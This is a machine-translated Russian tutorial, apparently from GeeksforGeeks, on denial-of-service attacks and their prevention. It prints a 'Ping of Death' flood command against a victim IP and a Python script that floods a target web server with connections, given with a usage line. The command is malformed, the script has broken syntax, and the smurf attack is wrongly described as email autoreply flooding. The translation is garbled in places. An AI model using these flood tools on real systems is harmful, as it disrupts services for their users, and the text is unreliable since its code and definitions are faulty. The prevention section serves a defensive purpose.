Рубрики

Отказ в обслуживании и профилактике

Отказ в обслуживании (DoS) — это кибератака на отдельный компьютер или веб-сайт с намерением запретить услуги для предполагаемых пользователей. Их цель — нарушить сетевые операции организации, отказав в доступе ее пользователям. Отказ в обслуживании обычно осуществляется путем наводнения. целевой компьютер или ресурс с избыточными запросами в попытке перегрузить системы и предотвратить выполнение некоторых или всех законных запросов.
Например, если веб-сайт банка может обрабатывать 10 человек в секунду, нажимая кнопку «Вход», злоумышленнику нужно только отправлять 10 поддельных запросов в секунду, чтобы ни один законный пользователь не мог войти в систему.

DoS-атаки используют различные недостатки компьютерных сетевых технологий. Они могут предназначаться для серверов, сетевых маршрутизаторов или сетевых каналов связи. Они могут привести к сбою компьютеров и маршрутизаторов и сбою ссылок.

Самая известная техника DoS — Ping of Death. Атака Ping of Death работает, генерируя и отправляя специальные сетевые сообщения (в частности, пакеты ICMP нестандартных размеров), которые создают проблемы для систем, которые их получают. В первые дни Интернета эта атака могла привести к быстрому падению незащищенных интернет-серверов.

Настоятельно рекомендуется попробовать все описанные действия на виртуальных машинах, а не в рабочей среде.

Ниже приведена команда для выполнения заполнения запроса по IP.

ping ip_address –t -65500

ВОТ,

  • «Ping» отправляет пакеты данных жертве.
  • «Ip_address» — это IP-адрес жертвы.
  • «-T» означает, что пакеты данных должны отправляться до тех пор, пока программа не будет остановлена.
  • «-L (65500)» определяет загрузку данных для отправки жертве.

Другие основные типы DoS-атак включают

  • Затопление сети бесполезной деятельностью, чтобы подлинный трафик не мог пройти. Атаки TCP / IP SYN и smurf являются двумя распространенными примерами.
  • Удаленная перегрузка ЦП системы, поэтому допустимые запросы не могут быть обработаны.
  • Изменение разрешений или нарушение логики авторизации для предотвращения входа пользователей в систему. Один общий пример включает в себя запуск быстрой серии ложных попыток входа в систему, которые блокируют учетные записи от возможности входа в систему.
  • Удаление или вмешательство в определенные критически важные приложения или службы для предотвращения их нормальной работы (даже если система и сеть в целом функционируют).

Другой вариант DoS — Smurf_attack . Это включает в себя электронные письма с автоматическими ответами. Если кто-то отправляет сотни сообщений электронной почты с поддельным обратным адресом электронной почты сотням людей в организации, у которых автоответчик включен в их электронную почту, первоначальные отправленные сообщения могут стать тысячами, отправленными на поддельный адрес электронной почты. Если этот фальшивый адрес электронной почты действительно принадлежит кому-то, это может перегрузить аккаунт этого человека.

DoS-атаки могут вызвать следующие проблемы:

  • Неэффективные услуги
  • Недоступные услуги
  • Прерывание сетевого трафика
  • Помехи при подключении

Ниже приведен скрипт на python для выполнения атаки типа «отказ в обслуживании» для небольшого веб-сайта, который не ожидал так много сокет-соединения.

# Обратите внимание, что запуск этого кода может
# потому что ваш IP заблокирован сервером. И цель
# этого кода только обучение

import socket, sys, os  

print "][ Attacking " + sys.argv[1+ " ... ]["  

print "injecting " + sys.argv[2];  

def attack():  

    #pid = os.fork ()

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  

    s.connect((sys.argv[1], 80))  

    print ">> GET /" + sys.argv[2] + " HTTP/1.1"  

    s.send("GET /" + sys.argv[2] + " HTTP/1.1\r\n")  

    s.send("Host: " + sys.argv[1+ "\r\n\r\n");  

    s.close()  

  
# Код драйвера

for i in range(1, 1000):  

    attack() 

Мы можем использовать приведенный выше код как

python ddos.py target_ip_address apache

профилактика

Учитывая, что атаки типа «отказ в обслуживании» (DoS) становятся все более частыми, сейчас самое время пересмотреть основы и способы борьбы с ними.

  • Поставщик услуг по снижению риска облачных вычислений. Поставщики услуг по снижению уровня облачных вычислений являются экспертами в области обеспечения защиты от DDoS-атак из облака. Это означает, что они создали огромную пропускную способность сети и емкость для предотвращения DDoS-атак на нескольких сайтах в Интернете, которые могут принимать любой сетевой трафик, независимо от того, используете ли вы несколько интернет-провайдеров, свой собственный центр обработки данных или любое количество облачных провайдеров. Они могут очищать трафик для вас и отправлять только «чистый» трафик в ваш дата-центр.
  • Брандмауэр — это самый простой и наименее эффективный метод. Обычно кто-то пишет некоторые скрипты Python, которые пытаются отфильтровать плохой трафик, или предприятие попытается использовать свои существующие брандмауэры для блокировки трафика.
  • Интернет-провайдер (ISP). Некоторые предприятия используют своего интернет-провайдера для снижения уровня DDoS. Эти интернет-провайдеры имеют большую пропускную способность, чем корпоративная, что может помочь при больших объемных атаках

Чтобы обезопасить себя от этих атак, вы должны применить безопасное кодирование и разработать надежную архитектуру, которая может предотвратить подобные атаки и обновить ежедневное решение ошибок вашего сайта.

Ссылки
https://www.owasp.org/index.php/Denial_of_Service
https://en.wikipedia.org/wiki/Denial-of-service_attack

Эта статья предоставлена Акашем Шараном . Если вы как GeeksforGeeks и хотели бы внести свой вклад, вы также можете написать статью с помощью contribute.geeksforgeeks.org или по почте статьи contribute@geeksforgeeks.org. Смотрите свою статью, появляющуюся на главной странице GeeksforGeeks, и помогите другим вундеркиндам.

Пожалуйста, пишите комментарии, если вы обнаружите что-то неправильное или вы хотите поделиться дополнительной информацией по обсуждаемой выше теме.

Рекомендуемые посты:

Отказ в обслуживании и профилактике

0.00 (0%) 0 votes